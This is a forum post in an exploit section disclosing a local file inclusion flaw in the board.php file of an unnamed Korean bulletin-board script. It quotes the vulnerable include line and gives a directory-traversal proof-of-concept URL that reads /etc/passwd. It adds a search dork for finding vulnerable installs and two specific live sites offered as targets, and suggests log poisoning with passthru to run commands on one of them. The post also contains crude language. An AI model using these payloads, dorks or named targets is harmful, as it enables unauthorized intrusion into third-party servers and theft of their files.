Jump to content
Guest Kenpachi

BBS BOARD UNKNOWN VERSION LFI (Local File Inclusion)

By Guest Kenpachi, in Exploituri

Recommended Posts

Guest Kenpachi

Guest Kenpachi

Posted
Posted

BBS BOARD UNKNOWN VERSION (can't read fucking koreean ... sry :| )

Bug type : Local File Inclusion

Affected file : board.php

Affected code : include "./board/" . $skin_dir . $Action . ".php" ;

Stupid ass blocking code : if(!isset($Table) && empty($Table) && $Action != "total_list") AlertMessage("°Ô½ÃÆÇÀÇ Å×À̺íÀÌ ÁöÁ¤µÇÁö ¾Ê¾Ò½À´Ï´Ù! Å×À̺íÀ» ÁöÁ¤Çϼ¼¿ä.");

Proof of concet: http://victim/[bbs path]/board.php?Action=../../../../../../../../../../../../etc/passwd%00&Table=dfgdsa

Dork: inurl:"bbs/board.php?Action"

And since I can't find a downloading site to prove my worthless LFI bug exists ... here's a couple of examples :

http://east-one.kr/bbs/board.php?Action=../../../../../../../../../../../../etc/passwd%00&Table=a

http://www.sinhungsa.or.kr/bbs/board.php?Action=../../../../../../../../../../../../etc/passwd%00&Table=a

if you really want to read the source code ... find the logs on east-one.kr ... inject a passthru and do 'cat board.php' to see what I'm talking about :\

//Kenpachi

//http://rstcenter.com/forum

//Nemessis + Ahead = BUTTSEX :|

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...